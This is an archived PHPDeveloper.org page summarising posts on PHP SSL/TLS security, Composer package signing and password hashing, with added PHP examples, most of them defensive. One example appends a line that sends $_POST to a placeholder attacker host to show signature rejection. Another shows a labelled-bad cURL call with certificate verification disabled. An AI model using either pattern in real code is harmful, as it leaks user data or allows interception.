
Pádraic Brady:
Thoughts on Composer's Future Security
March 06, 2014 @ 11:09:06

Pádraic Brady has a new post (in his own words, a "let's watch Paddy think aloud in a completely unstructured manner blog post") about the future of security in Composer, the popular PHP package manager. Composer has recently come under criticism for its lack of package signing and of TLS/SSL support for its downloads.

The Composer issue, as initially reported by Kevin McArthur, was fairly simple. Since no download connection by Composer was properly secured using SSL/TLS then an attacker could, with the assistance of a Man-In-The-Middle (MITM) attack, substitute the package you wanted to download with a modified version that communicated with the attacker's server. They could, for example, plant a line of code which sends the contents of $_POST to the attacker's server.

He's been working on some updates to the project, one of which is TLS/SSL support as defined in a pull request that is currently pending. It enables peer verification by default, follows the PHP 5.6 TLS recommendations and uses the local system's certificate store for the connection. He also discusses other TLS/SSL measures that could be added in the future and why, despite being far safer than nothing, TLS/SSL alone is not a cure-all for the problem: it authenticates the server you are talking to, not the package you end up running.

He then moves on to package signing and suggests one method for implementation - signing the "composer.phar" executable and signing "everything else" (packages to be downloaded) to verify their validity.
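What "signing everything else" looks like in practice, as an added example that is neither Composer's own signing scheme nor code from the post: a detached RSA signature over a release artifact (standing in for composer.phar) and the verification a downloader would run before executing it. The key pair is generated in-process for the demo; in practice the private key stays with the release maintainer and only the public key ships. The artifact contents, the attacker hostname and the temporary file path are constructed for the illustration, and the code assumes PHP 7.1 or later with the openssl extension.

```php
<?php
// Added example, not Composer's signing scheme: detached RSA-SHA256 signature
// over a release file plus verification, including rejection after tampering.

declare(strict_types=1);

function makeKeyPair(): array
{
    $key = openssl_pkey_new(['private_key_type' => OPENSSL_KEYTYPE_RSA, 'private_key_bits' => 2048]);
    if ($key === false) {
        throw new RuntimeException('key generation failed: ' . openssl_error_string());
    }
    openssl_pkey_export($key, $privatePem);                 // maintainer-only secret
    $publicPem = openssl_pkey_get_details($key)['key'];     // shipped with the installer
    return [$privatePem, $publicPem];
}

function signFile(string $path, string $privatePem): string
{
    $data = file_get_contents($path);
    if ($data === false || !openssl_sign($data, $signature, $privatePem, OPENSSL_ALGO_SHA256)) {
        throw new RuntimeException('signing failed');
    }
    return base64_encode($signature);   // what would be published next to the artifact
}

function verifyFile(string $path, string $sigB64, string $publicPem): bool
{
    $data      = file_get_contents($path);
    $signature = base64_decode($sigB64, true);
    if ($data === false || $signature === false) {
        return false;
    }
    // openssl_verify returns 1 (valid), 0 (bad signature) or -1/false (error):
    // anything other than exactly 1 is a rejection.
    return openssl_verify($data, $signature, $publicPem, OPENSSL_ALGO_SHA256) === 1;
}

// Constructed artifact standing in for composer.phar (temporary file).
$artifact = tempnam(sys_get_temp_dir(), 'phar');
file_put_contents($artifact, "<?php\necho 'composer';\n");

[$privatePem, $publicPem] = makeKeyPair();
$signature = signFile($artifact, $privatePem);
echo 'untouched artifact: ', verifyFile($artifact, $signature, $publicPem) ? "accepted\n" : "REJECTED\n";

// The MITM substitution the post describes: a line that ships $_POST to the
// attacker. Hostname is a placeholder (.invalid TLD, never resolves).
file_put_contents(
    $artifact,
    "@file_get_contents('http://attacker.invalid/?' . http_build_query(\$_POST));\n",
    FILE_APPEND
);
echo 'modified artifact:  ', verifyFile($artifact, $signature, $publicPem) ? "accepted\n" : "REJECTED\n";

unlink($artifact);
```

The check that matters is the strict `=== 1` on openssl_verify: a truthy test would accept the -1 error return, which is exactly the kind of mistake a signature scheme must not leave room for.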

The flaw in Composer's installer isn't that it's unsigned, it's that it doesn't afford the opportunity for the downloader to read it before it gets piped to PHP. It's a documentation issue. You can go down the route of using a CA, of course, but that's further down the rabbit hole than may be necessary. Signing the composer.phar file is another matter.
composer package signing tls ssl support security

Link: http://blog.astrumfutura.com/2014/03/thoughts-on-composers-future-security

Pádraic Brady:
PHP 5.6 and SSL/TLS Getting Better But Will PHP Programmers Actually Use It?
January 31, 2014 @ 11:24:32

In his latest post Pádraic Brady looks at a new addition to PHP (well, one to be included in the next release) related to the SSL/TLS handling it provides in streams. He's happy to report that things are improving: this commit integrated an RFC enabling TLS peer verification in PHP streams by default.

The RFC reverses PHP's course and provides PHP streams with defaults that enable both peer verification and host verification. The patch implements the RFC and it lets PHP leverage the local system's own certificate stash (e.g. Debian's ca-certificates) where possible to avoid PHP having to distribute a bundle of its own, while also assisting in backwards compatibility. [...] Once we have a PHP streams/sockets system with a passable level of default security, the rest will be left to programmers on the ground to change their practices.

With this new functionality coming in PHP 5.6, he strongly encourages developers to change how they're currently doing things and embrace this new verification to keep their code safer.
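The checks the RFC turns on, spelled out explicitly in a stream context so that the same fetch is verified on PHP 5.4 and 5.5 as well. This is an added example, not code from the post or the patch; the URL, and the CA bundle path (Debian's ca-certificates location) are placeholders, and the code is written in PHP 5 syntax so it actually runs on the older versions it targets.

```php
<?php
// Added example: explicit peer and host verification for an https:// stream,
// covering PHP before and after 5.6. Placeholders: URL and CA bundle path.

function secureHttpsGet($url, $caFile)
{
    $ssl = array(
        'verify_peer'         => true,    // validate the chain against $caFile
        'allow_self_signed'   => false,
        'cafile'              => $caFile,
        'disable_compression' => true,    // PHP >= 5.4.13; blunts CRIME-style attacks
    );
    if (PHP_VERSION_ID >= 50600) {
        $ssl['verify_peer_name'] = true;  // 5.6 default, made explicit
    } else {
        // Before 5.6 there is no verify_peer_name; CN_match does the host check.
        $ssl['CN_match'] = parse_url($url, PHP_URL_HOST);
    }
    $ctx = stream_context_create(array(
        'ssl'  => $ssl,
        'http' => array('follow_location' => 0), // no silent redirect to http://
    ));

    $body = @file_get_contents($url, false, $ctx);
    if ($body === false) {
        $err = error_get_last();
        $msg = $err ? $err['message'] : 'unknown error';
        throw new RuntimeException('TLS fetch failed: ' . $msg);
    }
    return $body;
}

try {
    $page = secureHttpsGet('https://example.com/', '/etc/ssl/certs/ca-certificates.crt');
    echo strlen($page), " bytes received over a verified connection\n";
} catch (RuntimeException $e) {
    fwrite(STDERR, $e->getMessage() . "\n");
    exit(1);
}
```

Failure is surfaced as an exception rather than swallowed: a verification error that merely returns an empty string is how code ends up "working" against a man-in-the-middle.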

ssl tls php56 programmer peer verification rfc

Link: http://blog.astrumfutura.com/2014/01/php-5-6-and-ssltls-getting-better-but-will-php-programmers-actually-use-it/

MySQL Performance Blog:
SSL Performance Overhead in MySQL
October 11, 2013 @ 11:30:28

On the MySQL Performance Blog there's a recent post looking at the impact of SSL on the overall performance of your application. This is part one of a two-part series and focuses largely on the results of two tests: one with connection pooling and the other evaluating connection time.

Some of you may recall my security webinar from back in mid-August; one of the follow-up questions that I was asked was about the performance impact of enabling SSL connections. My answer was 25%, based on some 2011 data that I had seen over on yaSSL's website, but I included the caveat that it is workload-dependent, because the most expensive part of using SSL is establishing the connection. Not long thereafter, I received a request to conduct some more specific benchmarks surrounding SSL usage in MySQL, and today I'm going to show the results.

He details the environments used for testing, including the hardware specs and the versions of the software installed. The scripts (really just bash scripts that call sysbench) are included in the post, and the results are both graphed and dumped in tabular form. The results are pretty surprising, mostly in how much of an impact SSL has on the requests. He makes a few recommendations at the end of the post on how to mitigate these problems (hint: it's not about MySQL per se, since the cost is concentrated in connection establishment).

performance overhead mysql ssl results benchmark sysbench

Link: http://www.mysqlperformanceblog.com/2013/10/10/mysql-ssl-performance-overhead/

Kevin Schroeder:
What SSL $_SERVER variables are available in PHP
September 02, 2013 @ 09:24:04

Kevin Schroeder has shared the results of a question he wanted answered about PHP running over an HTTPS (SSL) connection: which of the $_SERVER variables are available.

I found myself wondering what HTTPS variables were available in the $_SERVER variable today and didn't find a specific list (and didn't have mod_ssl installed). So as a public service, here is what my server says.

Thanks to the additional connection information mod_ssl passes through to PHP, there are several extra variables, including things like the following. Note that Apache only exports the SSL_* variables when SSLOptions +StdEnvVars is enabled for the location (it is off by default for performance reasons), while HTTPS is set whenever mod_ssl handled the request, so a missing SSL_PROTOCOL may just mean that option is off.

  • SSL_PROTOCOL
  • HTTPS (set to "on")
  • SSL_COMPRESS_METHOD
  • SSL_CLIENT_VERIFY
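How those variables are actually consumed, as an added example that is not from Kevin's post: deciding from $_SERVER alone whether a request came in over TLS and whether a client certificate was verified, which is the basis of certificate-based login. The $_SERVER snapshots are constructed for the demo, the distinguished names are invented, and the code assumes PHP 7.1 or later behind Apache mod_ssl.

```php
<?php
// Added example: interpreting mod_ssl's $_SERVER variables. Requires
// "SSLOptions +StdEnvVars" for the SSL_* entries to be present at all.

declare(strict_types=1);

function isTlsRequest(array $server): bool
{
    // mod_ssl sets HTTPS to "on"; IIS may set "off"; absent means plain HTTP.
    $https = strtolower((string) ($server['HTTPS'] ?? 'off'));
    return $https !== '' && $https !== 'off' && $https !== '0';
}

function hasVerifiedClientCert(array $server): bool
{
    // mod_ssl values: NONE, SUCCESS, GENEROUS, FAILED:<reason>.
    // Only SUCCESS means the chain validated against SSLCACertificateFile.
    // GENEROUS (SSLVerifyClient optional_no_ca) means "presented but unverifiable"
    // and must be treated like no certificate at all.
    return isTlsRequest($server)
        && ($server['SSL_CLIENT_VERIFY'] ?? 'NONE') === 'SUCCESS';
}

function clientIdentity(array $server): ?string
{
    if (!hasVerifiedClientCert($server)) {
        return null;
    }
    // The subject DN is only meaningful once the chain has been verified.
    return $server['SSL_CLIENT_S_DN'] ?? null;
}

// Constructed $_SERVER snapshots standing in for real requests.
$samples = [
    'plain http'          => ['REQUEST_URI' => '/'],
    'tls, no client cert' => ['HTTPS' => 'on', 'SSL_PROTOCOL' => 'TLSv1.2',
                              'SSL_CLIENT_VERIFY' => 'NONE'],
    'tls, verified cert'  => ['HTTPS' => 'on', 'SSL_PROTOCOL' => 'TLSv1.2',
                              'SSL_CLIENT_VERIFY' => 'SUCCESS',
                              'SSL_CLIENT_S_DN' => 'CN=alice,O=Example'],
    'tls, failed cert'    => ['HTTPS' => 'on', 'SSL_PROTOCOL' => 'TLSv1.2',
                              'SSL_CLIENT_VERIFY' => 'FAILED:certificate has expired',
                              'SSL_CLIENT_S_DN' => 'CN=mallory,O=Example'],
    'tls, generous'       => ['HTTPS' => 'on', 'SSL_CLIENT_VERIFY' => 'GENEROUS',
                              'SSL_CLIENT_S_DN' => 'CN=mallory,O=Example'],
];

foreach ($samples as $label => $server) {
    printf("%-22s tls=%-3s client=%s\n", $label,
        isTlsRequest($server) ? 'yes' : 'no',
        clientIdentity($server) ?? '(none)');
}
```

The trap worth noticing is the "failed cert" and "generous" rows: SSL_CLIENT_S_DN is populated in both, so any code that reads the DN without first checking SSL_CLIENT_VERIFY hands out an identity that was never validated.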
ssl server superglobal variable

Link: http://www.eschrade.com/page/what-ssl-_server-variables-are-available-in-php/

Artur Ejsmont's Blog:
How to properly secure remote API calls over SSL from PHP code
September 19, 2011 @ 13:56:00

Artur Ejsmont has a new post with a passionate call to arms for anyone who thinks that just because their URL has "https" in it, it's secure. He presents his suggestion on how to properly secure SSL API calls for your PHP application.

Let's make something clear from the very start: JUST BECAUSE THERE IS https:// IN THE URL OF THE REMOTE SERVICE IT DOES NOT MEAN THE CONNECTION IS SECURE! I am sorry for the tone of this post but I am enraged by how popular this issue is online. If you ask why, I suggest a little experiment [involving changing your hosts file and using a self-signed certificate].

The issue he spotlights is all too common: PHP code calls an https:// API but never verifies the certificate it is presented with, so the encryption protects the data from everyone except the party that matters, whoever answered the connection. He shows the bad practice many scripts follow, setting CURLOPT_SSL_VERIFYPEER and CURLOPT_SSL_VERIFYHOST to turn verification off, usually to silence a certificate error; that is a very bad idea. To protect yourself from man-in-the-middle or DNS hijacking attacks, leave both on (VERIFYHOST set to 2, not true) and point cURL at a trusted CA bundle instead of disabling the check.
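The verification-disabling snippet beside a hardened version, as an added example rather than the post's own code. The API URL and the CA bundle path are placeholders; the code assumes PHP 7 or later with the curl extension.

```php
<?php
// Added example: cURL with verification turned off (the pattern the post warns
// about) next to a version that verifies the chain and the hostname.

declare(strict_types=1);

// BAD: accepts any certificate from anyone, including a MITM or a hijacked DNS
// name. Written exactly the way it appears in copy-pasted "fixes" for cert errors.
function insecureGet(string $url)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);   // chain not checked
    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);       // hostname not checked
    $body = curl_exec($ch);
    curl_close($ch);
    return $body;                                      // string, or false on error
}

// GOOD: chain validated against a known CA bundle, hostname matched,
// only HTTPS allowed, and failures surfaced instead of swallowed.
function secureGet(string $url, string $caBundle): string
{
    $ch = curl_init($url);
    curl_setopt_array($ch, [
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_SSL_VERIFYPEER => true,
        // 2 = match the certificate name to the host. Never pass true: it is
        // cast to 1, which was a weaker check in old libcurl and is rejected now.
        CURLOPT_SSL_VERIFYHOST => 2,
        CURLOPT_CAINFO         => $caBundle,
        CURLOPT_PROTOCOLS      => CURLPROTO_HTTPS,     // refuse plain http://
        CURLOPT_FOLLOWLOCATION => false,               // no silent downgrade via redirect
        CURLOPT_TIMEOUT        => 10,
    ]);
    $body = curl_exec($ch);
    if ($body === false) {
        $msg = curl_error($ch);
        curl_close($ch);
        throw new RuntimeException('TLS request failed: ' . $msg);
    }
    curl_close($ch);
    return $body;
}

try {
    $json = secureGet('https://api.example.com/v1/status', '/etc/ssl/certs/ca-certificates.crt');
    echo strlen($json), " bytes from a verified peer\n";
} catch (RuntimeException $e) {
    fwrite(STDERR, $e->getMessage() . "\n");
    exit(1);
}
```

When the hardened version fails against a real endpoint the right fix is to supply the correct CA bundle (or, for an internal service, its own CA certificate via CURLOPT_CAINFO), never to fall back to the first function.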

ssl certificate api call protect verification


PHPBuilder.com:
Write an Ajax-driven Login Application in PHP Using SSL/TLS
September 09, 2010 @ 10:29:03

On the PHPBuilder.com site today there's a new tutorial from Octavia Anghel about creating a login for your site that's powered by Ajax and uses a bit more security than usual. It includes hooks to use either the aSSL library or an OpenSSL-backed HTTPS connection.

In this article you will learn how to write a login application in PHP using Ajax and SSL/TLS in two ways: either using aSSL (Ajax Server Secure Layer), a library that implements a technology similar to SSL without HTTPS, or simple Ajax and OpenSSL, an open source implementation of the SSL and TLS protocols.

They start with the aSSL method and link you to a download of the tool as well as some sample code to get you started passing data to it via the session. The second example shows the OpenSSL method, which mostly consists of checking, on the server side, the certificate that's passed along with the request.

ssl tls secure certificate assl openssl ajax


PHP Web Services:
How to configure https for Apache2.2 and consume PHP web services over https
May 24, 2010 @ 08:39:49

New from the PHP Web Services blog today there's a post showing you how to set up Apache 2.2 for HTTPS and then how to consume other web services over HTTPS from PHP.

The tutorial gives you a step-by-step process to follow with commands and configuration changes every step of the way:

  • Create a certificate
  • Generate a key
  • Sign the key with the certificate
  • Copy the keys to the right directory
  • Make configuration changes for the SSL connections
  • Connect to the remote HTTPS web service

If you're using PHP, you can also make requests to secure remote resources with the SOAP client and the https:// stream wrapper, provided PHP is built with the OpenSSL extension, which is what both rely on for SSL.
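The certificate steps from the list above, done with PHP's openssl extension instead of the openssl command line, as an added example that is not the tutorial's own commands. It runs them in the order the tooling actually needs (key first, then request, then signature), writes the two files that Apache's SSLCertificateFile and SSLCertificateKeyFile directives point at, and self-signs because there is no CA in the picture; a production server would send the request to a CA instead. Output paths, the host name and the subject fields are placeholders; the code assumes PHP 7 or later.

```php
<?php
// Added example: server key, certificate request and self-signed certificate
// generated via ext/openssl, in the order Apache's configuration needs them.

declare(strict_types=1);

function makeSelfSignedServerCert(string $host, string $keyOut, string $certOut, int $days = 365): void
{
    // 1. generate the private key
    $key = openssl_pkey_new(['private_key_type' => OPENSSL_KEYTYPE_RSA, 'private_key_bits' => 2048]);
    if ($key === false) {
        throw new RuntimeException('key generation failed: ' . openssl_error_string());
    }

    // 2. certificate request naming the host Apache will serve (placeholder subject)
    $dn  = ['countryName' => 'US', 'organizationName' => 'Example', 'commonName' => $host];
    $csr = openssl_csr_new($dn, $key, ['digest_alg' => 'sha256']);
    if ($csr === false) {
        throw new RuntimeException('CSR creation failed: ' . openssl_error_string());
    }

    // 3. sign it. null CA certificate = self-signed; a real deployment submits
    //    the CSR to a CA and receives the certificate back instead.
    $cert = openssl_csr_sign($csr, null, $key, $days, ['digest_alg' => 'sha256']);
    if ($cert === false) {
        throw new RuntimeException('signing failed: ' . openssl_error_string());
    }

    // 4. write the files SSLCertificateKeyFile / SSLCertificateFile point at
    openssl_pkey_export_to_file($key, $keyOut);
    chmod($keyOut, 0600);                       // the private key must not be world-readable
    openssl_x509_export_to_file($cert, $certOut);
}

function certSummary(string $certFile): array
{
    $info = openssl_x509_parse((string) file_get_contents($certFile));
    return [
        'subject'  => $info['subject']['CN'],
        'notAfter' => date('c', $info['validTo_time_t']),
    ];
}

// Placeholder paths; in the tutorial's layout these go under Apache's conf tree.
makeSelfSignedServerCert('www.example.com', '/tmp/server.key', '/tmp/server.crt');
print_r(certSummary('/tmp/server.crt'));
```

The chmod on the key is the step most often skipped in quick tutorials; a world-readable server key lets any local user impersonate the site for the certificate's whole lifetime.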

https apache configuration ssl tutorial


HowToForge.com:
The Ultimate Media Server - Apache+SSL , PHP, MySQL and Jinzora
February 08, 2006 @ 07:02:10

HowToForge.com has posted a new tutorial on installing the "ultimate media server" for personal use, built on an Apache+SSL, PHP, MySQL, and Jinzora base.

This guide will lead you through creating a secure ssl based webserver to be able to stream your multimedia across the World Wide Web. Before embarking on this journey I would highly recommend reading this documentation in its fullest before executing any of it. You may find some pointers in the tips and tweaks section that you can make during installation that would make this install even easier and make it a one time install.

There are a few requirements they mention, but once that's all arranged, it's a pretty simple setup overall. It uses the Jinzora software to provide the media streaming/management component of the setup...

media server mysql apache ssl jinzora


PHPit.net:
Handling passwords safely in PHP
February 06, 2006 @ 07:17:10

PHPit.net is back today with another new tutorial - this time it concerns the safe handling of passwords in your PHP scripts.

If you're ever going to create a script that involves users or passwords, which is very likely, you'll probably run across security issues with handling the passwords. You can't just store the passwords in clear text in your database, and great care must be used when managing the passwords (for example during login).

In this article I will show you everything that you have to think about when handling passwords in PHP, and how to solve some common problems.

They offer suggestions like storing them hashed (md5 or sha1), protecting them with a salt, serving the login over SSL, and how to manage their use with things like cookies and sessions. Bear in mind this is 2006 advice: a salted MD5 or SHA-1 is no longer considered adequate for password storage because both are fast to brute-force, and current PHP provides password_hash() and password_verify() for exactly this purpose.
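The salted-hash scheme of that era next to the current API, as an added example that is neither PHPit's code nor the article's. It includes an upgrade path, since the realistic situation is a table full of legacy hashes rather than a greenfield schema. The user table is an in-memory array standing in for the database, the passwords are constructed, and the code assumes PHP 7.1 or later.

```php
<?php
// Added example: 2006-style salted SHA-1 beside password_hash(), with
// transparent migration of legacy hashes on successful login.

declare(strict_types=1);

// Legacy scheme: per-user random salt stored beside the digest as "salt$hex".
// Better than bare md5(), but SHA-1 is fast, so offline guessing stays cheap.
function legacyHash(string $password, ?string $salt = null): string
{
    $salt = $salt ?? bin2hex(random_bytes(8));
    return $salt . '$' . sha1($salt . $password);
}

function legacyVerify(string $password, string $stored): bool
{
    [$salt] = explode('$', $stored, 2);
    // constant-time comparison; a plain === leaks timing information
    return hash_equals($stored, legacyHash($password, $salt));
}

// Current scheme: bcrypt via password_hash(), salt and cost embedded in the string.
function modernHash(string $password): string
{
    return password_hash($password, PASSWORD_DEFAULT, ['cost' => 12]);
}

function modernVerify(string $password, string $stored): bool
{
    return password_verify($password, $stored);
}

// Login that accepts either format and replaces legacy hashes once the
// plaintext is available (i.e. at a successful login), so no mass reset is needed.
function loginAndUpgrade(array &$users, string $name, string $password): bool
{
    if (!isset($users[$name])) {
        // still burn a hash so a missing user is not distinguishable by timing
        modernVerify($password, modernHash('dummy'));
        return false;
    }
    $stored = $users[$name];

    if (strpos($stored, '$2y$') === 0) {                 // already bcrypt
        if (!modernVerify($password, $stored)) {
            return false;
        }
        if (password_needs_rehash($stored, PASSWORD_DEFAULT, ['cost' => 12])) {
            $users[$name] = modernHash($password);       // cost was raised since
        }
        return true;
    }

    if (!legacyVerify($password, $stored)) {
        return false;
    }
    $users[$name] = modernHash($password);               // upgrade on the spot
    return true;
}

// Constructed user table: one legacy row, one modern row.
$users = [
    'alice' => legacyHash('correct horse'),
    'bob'   => modernHash('battery staple'),
];

echo 'alice, wrong password: ', loginAndUpgrade($users, 'alice', 'wrong') ? "ok\n" : "denied\n";
echo 'alice, right password: ', loginAndUpgrade($users, 'alice', 'correct horse') ? "ok\n" : "denied\n";
echo 'alice stored hash now starts with: ', substr($users['alice'], 0, 4), "\n";
echo 'bob, right password:   ', loginAndUpgrade($users, 'bob', 'battery staple') ? "ok\n" : "denied\n";
```

The dummy verification on the unknown-user branch and the hash_equals() call are the two details that separate a login routine from a timing oracle; both are cheap to add and easy to forget.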

handle password safely logging signup md5 sha1 ssl




All content copyright, 2014 PHPDeveloper.org :: info@phpdeveloper.org - Powered by the Solar PHP Framework